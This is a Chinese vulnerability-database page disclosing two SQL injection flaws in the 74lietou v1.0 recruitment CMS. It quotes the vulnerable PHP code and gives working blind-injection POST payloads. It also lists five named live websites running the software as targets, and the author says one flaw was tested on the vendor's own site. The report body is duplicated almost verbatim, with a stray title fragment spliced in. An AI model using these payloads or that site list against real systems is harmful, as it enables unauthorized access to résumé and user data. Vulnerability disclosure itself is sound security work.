|74lietou v1.0最新注入2处(可获取部分数据) - VULHUB开源网络安全威胁库

74lietou v1.0最新注入2处(可获取部分数据)

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：官网地址：http://74lietou.74cms.com/ ### 详细说明：在/plus/ajax_user.php中 ``` elseif($act == 'only_check_language'){ $lang = trim($_POST['param'])?trim($_POST['param']):exit("选择语言不能为空！"); $sql = "select * from ".table('resume_language')." where language = ".$lang." and uid = ".$_SESSION['uid']; $userinfo=$db->getone($sql); if ($userinfo) { exit("已经选择此语言!"); }else{ exit("y"); } ``` POST值过来，没有单引号包含，导致注入 http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language POST值 ``` param=12' ||%20left(version(),1)%20between%200%20and%205--%20a ``` 这样猜解数据库版本第一位是0到5之间，返回已经选择此语言! ``` param=12' ||%20left(version(),1)%20between%200%20and%204--%20a ``` 这样猜解数据库版本第一位是0到4之间，返回y [<img src="https://images.seebug.org/upload/201507/211154592e62268ccfed4629294c1486b10c0c82.jpg" alt="360截图-1870531.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/211154592e62268ccfed4629294c1486b10c0c82.jpg) [<img src="https://images.seebug.org/upload/201507/2111550910ffcaa36b9b7cc2e1d1ee0e8b10f3c5.jpg" alt="360截图-1882703.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/2111550910ffcaa36b9b7cc2e1d1ee0e8b10f3c5.jpg) 第二处出现在/user/company/company_recruitment.php中 ``` elseif($act =="export_resume") { $yid =!empty($_REQUEST['y_id'])?$_REQUEST['y_id']:showmsg("你没有选择简历！",1); if(!export_resume($yid)){ showmsg("导出失败！",0); } ``` 跟踪export_resume ``` function export_resume($yid){ global $db; if(is_array($yid) && !empty($yid)) { $yid_str = implode(",", $yid); } else { $yid_str=$yid; } $oederbysql=" order BY refreshtime desc "; $wheresql = empty($wheresql)?" id in ({$yid_str}) ":" and id in ({$yid_str}) "; if (!empty($wheresql)) { $wheresql=" WHERE ".ltrim(ltrim($wheresql),'AND'); } $data = $db->getall("select * from ".table('resume').$wheresql); ``` $_REQUEST['y_id']没有被过滤导致过滤，这个要登录而且要被审核就不用官网演示了本地测试！ [<img src="https://images.seebug.org/upload/201507/211204448fb48e6cbfd8b7fc4d412635555ad2c1.jpg" alt="360截图-2515750.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/211204448fb48e6cbfd8b7fc4d412635555ad2c1.jpg) [<img src="https://images.seebug.org/upload/201507/21120452f55c43ace85162414c0d3bd8e0e38879.jpg" alt="360截图-2536218.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/21120452f55c43ace85162414c0d3bd8e0e38879.jpg) 一样用POST值 ``` ' ||%20left(version(),1)%20between%200%20and%205--%20a ``` 这样猜解数据库版本第一位是0到5之间 ``` ' ||%20left(version(),1)%20between%200%20and%204--%20a ``` 这样猜解数据库版本第一位是0到4之间这样的办法就可以注入了，这个不演示了案例：关键字Powered by 74lietou v1.0 ``` http://www.5i5s.com/plus/ajax_user.php?act=only_check_language http://lietou.hi772.com/plus/ajax_user.php?act=only_check_language http://www.haolietou.com/plus/ajax_user.php?act=only_check_language http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language http://www.elancejob.com/plus/ajax_user.php?act=only_check_language ``` ### 漏洞证明：在/plus/ajax_user.php中 ``` elseif($act == 'only_check_language'){ $lang = trim($_POST['param'])?trim($_POST['param']):exit("选择语言不能为空！"); $sql = "select * from ".table('resume_language')." where language = ".$lang." and uid = ".$_SESSION['uid']; $userinfo=$db->getone($sql); if ($userinfo) { exit("已经选择此语言!"); }else{ exit("y"); } ``` POST值过来，没有单引号包含，导致注入 http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language POST值 ``` param=12' ||%20left(version(),1)%20between%200%20and%205--%20a ``` 这样猜解数据库版本第一位是0到5之间，返回已经选择此语言! ``` param=12' ||%20left(version(),1)%20between%200%20and%204--%20a ``` 这样猜解数据库版本第一位是0到4之间，返回y [<img src="https://images.seebug.org/upload/201507/211154592e62268ccfed4629294c1486b10c0c82.jpg" alt="360截图-1870531.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/211154592e62268ccfed4629294c1486b10c0c82.jpg) [<img src="https://images.seebug.org/upload/201507/2111550910ffcaa36b9b7cc2e1d1ee0e8b10f3c5.jpg" alt="360截图-1882703.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/2111550910ffcaa36b9b7cc2e1d1ee0e8b10f3c5.jpg) 第二处出现在/user/company/company_recruitment.php中 ``` elseif($act =="export_resume") { $yid =!empty($_REQUEST['y_id'])?$_REQUEST['y_id']:showmsg("你没有选择简历！",1); if(!export_resume($yid)){ showmsg("导出失败！",0); } ``` 跟踪export_resume ``` function export_resume($yid){ global $db; if(is_array($yid) && !empty($yid)) { $yid_str = implode(",", $yid); } else { $yid_str=$yid; } $oederbysql=" order BY refreshtime desc "; $wheresql = empty($wheresql)?" id in ({$yid_str}) ":" and id in ({$yid_str}) "; if (!empty($wheresql)) { $wheresql=" WHERE ".ltrim(ltrim($wheresql),'AND'); } $data = $db->getall("select * from ".table('resume').$wheresql); ``` $_REQUEST['y_id']没有被过滤导致过滤，这个要登录而且要被审核就不用官网演示了本地测试！ [<img src="https://images.seebug.org/upload/201507/211204448fb48e6cbfd8b7fc4d412635555ad2c1.jpg" alt="360截图-2515750.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/211204448fb48e6cbfd8b7fc4d412635555ad2c1.jpg) [<img src="https://images.seebug.org/upload/201507/21120452f55c43ace85162414c0d3bd8e0e38879.jpg" alt="360截图-2536218.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/21120452f55c43ace85162414c0d3bd8e0e38879.jpg) 一样用POST值74lietou v1.0最新绕过全局防御注入2处(官网演示) 这样的办法就可以注入了，这个不演示了案例：关键字Powered by 74lietou v1.0 ``` http://www.5i5s.com/plus/ajax_user.php?act=only_check_language http://lietou.hi772.com/plus/ajax_user.php?act=only_check_language http://www.haolietou.com/plus/ajax_user.php?act=only_check_language http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language http://www.elancejob.com/plus/ajax_user.php?act=only_check_language ```

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™